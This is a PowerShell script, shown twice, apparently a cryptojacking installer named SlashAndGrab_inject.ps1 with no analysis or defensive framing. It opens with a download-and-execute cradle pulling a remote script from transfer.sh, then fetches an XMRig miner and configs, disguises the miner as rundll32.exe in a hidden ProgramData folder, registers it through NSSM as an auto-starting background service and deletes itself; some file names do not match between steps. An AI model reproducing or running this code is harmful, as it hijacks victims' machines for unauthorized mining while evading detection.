Purp1eW0lf/SlashAndGrab_inject.ps1

## SlashAndGrab_inject.ps1
powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\"

# Check for Administrator rights
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
    Write-Host 'Please Run as Administrator!' -ForegroundColor Red
    Exit
}
# Check and return current user name
$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]
# Paths
$dircheck = 'C:\ProgramData\.logstxt'
#$filcheck = 'C:\path\to\xmrig.service'  # You might need to adjust this, Windows doesn't have an equivalent to systemd
$filcheck = 'C:\Users\$currentUserName\rundll32.exe'
# Removal functions
if (Test-Path $dircheck) {
    Remove-Item -Recurse -Force $dircheck
}
if (Test-Path $filcheck) {
    Remove-Item -Force $filcheck
}

# Download files, I am using ngrok as port forwarding for my containers to FTP server
$listi = 'https://transfer.sh/UFQTwgYszH/config14.json','https://transfer.sh/ATVMNG5Pbu/config13.json','https://transfer.sh/s27p8BcTxi/config12.json','https://transfer.sh/ojw6aKoA4A/config11.json','https://transfer.sh/lyEkHLGt03/config10.json','https://transfer.sh/8l4d5qR39o/config9.json','https://transfer.sh/xkIMWnocQH/config8.json','https://transfer.sh/Db5eUfqKP9/config7.json','https://transfer.sh/L1e30KShXP/config6.json','https://transfer.sh/w2Y0iuEKiY/config5.json','https://transfer.sh/6bkwRh4NXd/config4.json','https://transfer.sh/PRBRzMMEKC/config3.json','https://transfer.sh/RWSn6NLIr7/config2.json','https://transfer.sh/MRFibhy8fS/config1.json','https://transfer.sh/FeDRSFU5XV/config.json'
$randconf = Get-Random -InputObject $listi
Invoke-WebRequest -Uri $randconf -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'config.json'
Invoke-WebRequest -Uri 'https://transfer.sh/ePlTBkDtz2/rundll32.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'xmrig.exe'
Invoke-WebRequest -Uri 'https://transfer.sh/CrNx3LVEgY/nssm.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'nssm.exe'

# Create xmrig service file (assuming this has an equivalent in Windows)
# TODO: Check if you need an actual service wrapper like NSSM

# Get thread count (using CPU count as a basic substitute for now)
$threads = (Get-WmiObject -Class Win32_ComputerSystem).NumberOfLogicalProcessors
$tf = [math]::Round(25 * $threads)

# Move and setup files
if (-not (Test-Path $dircheck)) {
    New-Item -ItemType Directory -Path $dircheck
}
Move-Item rundll32.exe $dircheck
Move-Item config.json $dircheck
Move-Item nssm.exe $dircheck
# Move-Item xmrig.service C:\path\to\services\folder  # Adjust path and use only if required

# TODO: Setup as a Windows service (consider tools like NSSM or `sc` command)

#create a nssm command that will make the xmrig.exe run as a service in the background
Set-Location $dircheck
.\nssm install xmrig 'C:\ProgramData\.logstxt\rundll32.exe'
.\nssm set xmrig AppDirectory 'C:\ProgramData\.logstxt'
.\nssm set xmrig AppParameters 'rundll32.exe -B -c config.json' # -B = run the miner in the background

# Start the service
.\nssm start xmrig

#make the xmrig service run on startup
.\nssm set xmrig start SERVICE_AUTO_START

#make the xmrig write in a log file
.\nssm set xmrig AppNoConsole 1

#make the xmrig run in the background
.\nssm set xmrig Type SERVICE_WIN32_OWN_PROCESS


# TODO: Windows doesn't have an equivalent to sysctl or hugepages in the same sense as Linux

# Clean up
Remove-Item $PSCommandPath -Force
	powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\"

	# Check for Administrator rights
	if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
	Write-Host 'Please Run as Administrator!' -ForegroundColor Red
	Exit
	}
	# Check and return current user name
	$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]
	# Paths
	$dircheck = 'C:\ProgramData\.logstxt'
	#$filcheck = 'C:\path\to\xmrig.service' # You might need to adjust this, Windows doesn't have an equivalent to systemd
	$filcheck = 'C:\Users\$currentUserName\rundll32.exe'
	# Removal functions
	if (Test-Path $dircheck) {
	Remove-Item -Recurse -Force $dircheck
	}
	if (Test-Path $filcheck) {
	Remove-Item -Force $filcheck
	}

	# Download files, I am using ngrok as port forwarding for my containers to FTP server
	$listi = 'https://transfer.sh/UFQTwgYszH/config14.json','https://transfer.sh/ATVMNG5Pbu/config13.json','https://transfer.sh/s27p8BcTxi/config12.json','https://transfer.sh/ojw6aKoA4A/config11.json','https://transfer.sh/lyEkHLGt03/config10.json','https://transfer.sh/8l4d5qR39o/config9.json','https://transfer.sh/xkIMWnocQH/config8.json','https://transfer.sh/Db5eUfqKP9/config7.json','https://transfer.sh/L1e30KShXP/config6.json','https://transfer.sh/w2Y0iuEKiY/config5.json','https://transfer.sh/6bkwRh4NXd/config4.json','https://transfer.sh/PRBRzMMEKC/config3.json','https://transfer.sh/RWSn6NLIr7/config2.json','https://transfer.sh/MRFibhy8fS/config1.json','https://transfer.sh/FeDRSFU5XV/config.json'
	$randconf = Get-Random -InputObject $listi
	Invoke-WebRequest -Uri $randconf -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'config.json'
	Invoke-WebRequest -Uri 'https://transfer.sh/ePlTBkDtz2/rundll32.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'xmrig.exe'
	Invoke-WebRequest -Uri 'https://transfer.sh/CrNx3LVEgY/nssm.exe' -Headers @{'ngrok-skip-browser-warning'='true'} -OutFile 'nssm.exe'

	# Create xmrig service file (assuming this has an equivalent in Windows)
	# TODO: Check if you need an actual service wrapper like NSSM

	# Get thread count (using CPU count as a basic substitute for now)
	$threads = (Get-WmiObject -Class Win32_ComputerSystem).NumberOfLogicalProcessors
	$tf = [math]::Round(25 * $threads)

	# Move and setup files
	if (-not (Test-Path $dircheck)) {
	New-Item -ItemType Directory -Path $dircheck
	}
	Move-Item rundll32.exe $dircheck
	Move-Item config.json $dircheck
	Move-Item nssm.exe $dircheck
	# Move-Item xmrig.service C:\path\to\services\folder # Adjust path and use only if required

	# TODO: Setup as a Windows service (consider tools like NSSM or `sc` command)

	#create a nssm command that will make the xmrig.exe run as a service in the background
	Set-Location $dircheck
	.\nssm install xmrig 'C:\ProgramData\.logstxt\rundll32.exe'
	.\nssm set xmrig AppDirectory 'C:\ProgramData\.logstxt'
	.\nssm set xmrig AppParameters 'rundll32.exe -B -c config.json' # -B = run the miner in the background

	# Start the service
	.\nssm start xmrig

	#make the xmrig service run on startup
	.\nssm set xmrig start SERVICE_AUTO_START

	#make the xmrig write in a log file
	.\nssm set xmrig AppNoConsole 1

	#make the xmrig run in the background
	.\nssm set xmrig Type SERVICE_WIN32_OWN_PROCESS



	# TODO: Windows doesn't have an equivalent to sysctl or hugepages in the same sense as Linux

	# Clean up
	Remove-Item $PSCommandPath -Force